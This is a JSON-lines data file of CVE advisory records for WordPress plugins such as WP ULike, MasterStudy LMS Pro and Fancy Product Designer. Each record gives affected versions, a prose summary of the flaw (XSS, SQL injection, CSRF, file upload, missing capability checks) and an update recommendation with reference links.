{"CVE_ID":"CVE-2025-3503","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ddd432-309f-4ff5-974c-fdc9c67d1051\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ddd432-309f-4ff5-974c-fdc9c67d1051\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3502","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd436064-e611-4a4b-a873-67ed6029c46f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd436064-e611-4a4b-a873-67ed6029c46f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9215","slug":"publishpress-authors","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to Insecure Direct Object Reference to Privilege Escalation\/Account Takeover in all versions up to, and including, 4.7.1 via the action_edited_author() due to missing validation on the 'authors-user_id' user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update arbitrary user accounts email addresses, including administrators, which can then be leveraged to reset that user's account password and gain access.","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0506137-82e3-4988-9b23-370465a866c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0506137-82e3-4988-9b23-370465a866c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/publishpress-authors\\\/tags\\\/4.7.1\\\/src\\\/core\\\/Classes\\\/Author_Editor.php#L594\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/publishpress-authors\\\/tags\\\/4.7.1\\\/src\\\/core\\\/Classes\\\/Author_Editor.php#L594\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169244%40publishpress-authors&new=3169244%40publishpress-authors&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169244%40publishpress-authors&new=3169244%40publishpress-authors&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0479","slug":"woocommerce-delivery-notes","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The Print Invoice & Delivery Notes for WooCommerce WordPress plugin before 4.7.2 is vulnerable to reflected XSS by echoing a GET value in an admin note within the WooCommerce orders page. This means that this vulnerability can be exploited for users with the edit_others_shop_orders capability. WooCommerce must be installed and active. This vulnerability is caused by a urldecode() after cleanup with esc_url_raw(), allowing double encoding.","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50963747-ae8e-42b4-bb42-cc848be7b92e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50963747-ae8e-42b4-bb42-cc848be7b92e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6497","slug":"wordpress-simple-paypal-shopping-cart","versionEndExcluding":"4.7.2","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6201a1-7ca9-461b-b9ad-16407120dfae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac6201a1-7ca9-461b-b9ad-16407120dfae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007737%40wordpress-simple-paypal-shopping-cart&new=3007737%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007737%40wordpress-simple-paypal-shopping-cart&new=3007737%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6637","slug":"host-analyticsjs-local","versionImpact":"4.7.14","versionEndExcluding":"4.7.15","description":"The CAOS | Host Google Analytics Locally plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 4.7.14. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"Update to version 4.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ec1fd03-f865-4f58-b63b-e70c0c7e701d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ec1fd03-f865-4f58-b63b-e70c0c7e701d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-analyticsjs-local\\\/tags\\\/4.7.12\\\/includes\\\/class-caos.php#L414\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-analyticsjs-local\\\/tags\\\/4.7.12\\\/includes\\\/class-caos.php#L414\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008878\\\/host-analyticsjs-local#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008878\\\/host-analyticsjs-local#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009011\\\/host-analyticsjs-local#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009011\\\/host-analyticsjs-local#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7438","slug":"masterstudy-lms-learning-management-system-pro","versionImpact":"4.7.9","versionEndExcluding":"4.7.10","description":"The MasterStudy LMS Pro plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'install_and_activate_plugin' function in all versions up to, and including, 4.7.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability is difficult to exploit due to timing requirements and environmental factors.","recommendation":"Update to version 4.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ab970f5-35d1-43e9-891c-87a2a3e464c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ab970f5-35d1-43e9-891c-87a2a3e464c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4800","slug":"masterstudy-lms-learning-management-system-pro","versionImpact":"4.7.0","versionEndExcluding":"4.7.1","description":"The MasterStudy LMS Pro plugin for WordPress is vulnerable to arbitrary file uploads due to a missing file type validation in the stm_lms_add_assignment_attachment function in all versions up to, and including, 4.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server, which may make remote code execution possible.","recommendation":"Update to version 4.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/stylemixthemes.com\\\/wordpress-lms-plugin\\\/\",\"name\":\"https:\\\/\\\/stylemixthemes.com\\\/wordpress-lms-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/masterstudy-education-center-wordpress-theme\\\/12170274\\\/\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/masterstudy-education-center-wordpress-theme\\\/12170274\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c170a228-4abd-4ee6-ba37-bdcde1cb7fc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c170a228-4abd-4ee6-ba37-bdcde1cb7fc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6094","slug":"wp-ulike","versionImpact":"4.7.0","versionEndExcluding":"4.7.1","description":"The WP ULike  WordPress plugin before 4.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/019b3f34-7b85-4728-8dd7-ca472d6b2d06\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/019b3f34-7b85-4728-8dd7-ca472d6b2d06\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5595","slug":"essential-blocks","versionImpact":"4.6.1","versionEndExcluding":"4.7.0","description":"The Essential Blocks  WordPress plugin before 4.7.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2b8f092-4fc0-4edc-ba0f-d4312c2e5dec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2b8f092-4fc0-4edc-ba0f-d4312c2e5dec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1797","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to SQL Injection via the 'status' and 'id' attributes of the 'wp_ulike_counter' and 'wp_ulike' shortcodes in all versions up to, and including, 4.6.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d225dee1-305c-4378-bc07-192347a0c838?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d225dee1-305c-4378-bc07-192347a0c838?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052611%40wp-ulike&new=3052611%40wp-ulike&sfp_email=&sfph_mail=#file43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052611%40wp-ulike&new=3052611%40wp-ulike&sfp_email=&sfph_mail=#file43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1759","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d844ca83-84e5-4b6c-ae26-f300c7328d78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d844ca83-84e5-4b6c-ae26-f300c7328d78?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/admin\\\/classes\\\/class-wp-ulike-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/admin\\\/classes\\\/class-wp-ulike-widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1572","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_ulike' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on the user supplied 'wrapper_class' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb1527-0637-44f2-b336-d0cf2a48fa52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb1527-0637-44f2-b336-d0cf2a48fa52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ulike\\\/tags\\\/4.6.9\\\/includes\\\/functions\\\/templates.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ulike\\\/tags\\\/4.6.9\\\/includes\\\/functions\\\/templates.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/includes\\\/classes\\\/class-wp-ulike-cta-template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/includes\\\/classes\\\/class-wp-ulike-cta-template.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4334","slug":"fancy-product-designer","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The Fancy Product Designer plugin for WordPress is vulnerable to unauthorized modification of site options due to a missing capability check on the fpd_update_options function in versions up to, and including, 4.6.9. This makes it possible for authenticated attackers with subscriber-level permissions to modify site options, including setting the default role to administrator which can allow privilege escalation.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea097cb7-85f4-4b6d-9f29-bc2636993f21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea097cb7-85f4-4b6d-9f29-bc2636993f21?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"name\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0765","slug":"gallery-plugin","versionEndExcluding":"4.7.0","description":"The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not properly escape values used in SQL queries, leading to an Blind SQL Injection vulnerability. The attacker must have at least the privileges of an Author, and the vendor's Slider plugin (https:\/\/wordpress.org\/plugins\/slider-bws\/) must also be installed for this vulnerability to be exploitable.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2699cefa-1cae-4ef3-ad81-7f3db3fcce25\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2699cefa-1cae-4ef3-ad81-7f3db3fcce25\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0764","slug":"gallery-plugin","versionEndExcluding":"4.7.0","description":"The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not perform proper sanitization of gallery information, leading to a Stored Cross-Site Scripting vulnerability. The attacker must have at least the privileges of the Author role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48c6c50-3734-4191-9833-0d9b09b1bd8a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48c6c50-3734-4191-9833-0d9b09b1bd8a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4335","slug":"fancy-product-designer","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The Fancy Product Designer plugin for WordPress is vulnerable to unauthorized access to data and modification of plugin settings due to a missing capability check on multiple AJAX functions in versions up to, and including, 4.6.9. This makes it possible for authenticated attackers with subscriber-level permissions to modify plugin settings, including retrieving arbitrary order information or creating\/updating\/deleting products, orders, or other sensitive information not associated with their own account.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644624d8-c193-4ee6-bc82-7ccda5d7f2ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644624d8-c193-4ee6-bc82-7ccda5d7f2ac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"name\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12323","slug":"turbosmtp","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The turboSMTP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link while logged in to turboSMTP.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/turbosmtp\\\/trunk\\\/turbo-stats-section.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/turbosmtp\\\/trunk\\\/turbo-stats-section.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205021\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205021\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca9f71c-42e6-416f-94f2-cb79bbdfc69a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca9f71c-42e6-416f-94f2-cb79bbdfc69a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6243","slug":"eventon","versionImpact":"4.6.8","versionEndExcluding":"4.7","description":"The EventON PRO - WordPress Virtual Event Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.8. This is due to missing or incorrect nonce validation on the admin_test_email function. This makes it possible for unauthenticated attackers to send test emails to arbitrary email addresses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d0a40f8-4c31-447d-ac28-73cfe7a07687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d0a40f8-4c31-447d-ac28-73cfe7a07687?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3017939%40eventon-lite&new=3017939%40eventon-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3017939%40eventon-lite&new=3017939%40eventon-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.myeventon.com\\\/documentations\\\/eventon-changelog\\\/\",\"name\":\"https:\\\/\\\/docs.myeventon.com\\\/documentations\\\/eventon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11781","slug":"smart-agenda-prise-de-rendez-vous-en-ligne","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The Smart Agenda \u2013 Prise de rendez-vous en ligne plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'smartagenda' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&new=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&new=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a7bb274-9bbf-4d78-ad81-0e7ac6b7b265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a7bb274-9bbf-4d78-ad81-0e7ac6b7b265?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10885","slug":"searchiq","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The SearchIQ \u2013 The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/tags\\\/4.6\\\/library\\\/shortcode.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/tags\\\/4.6\\\/library\\\/shortcode.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198694\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198694\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e8e16f-9d93-457a-9093-2fd236e51682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e8e16f-9d93-457a-9093-2fd236e51682?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13356","slug":"dsgvo-all-in-one-for-wp","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The DSGVO All in one for WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6. This is due to missing or incorrect nonce validation in the user_remove_form.php file. This makes it possible for unauthenticated attackers to delete admin user accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233492\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233492\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efe885d-7e17-4057-abde-37482047facb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efe885d-7e17-4057-abde-37482047facb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4919","slug":"iframe","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `iframe` shortcode in versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permission and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 4.6 and fully patched in version 4.7.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L40\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3706deed-55f2-4dfb-bfed-7a14872cd15a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3706deed-55f2-4dfb-bfed-7a14872cd15a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970787\\\/iframe#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970787\\\/iframe#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
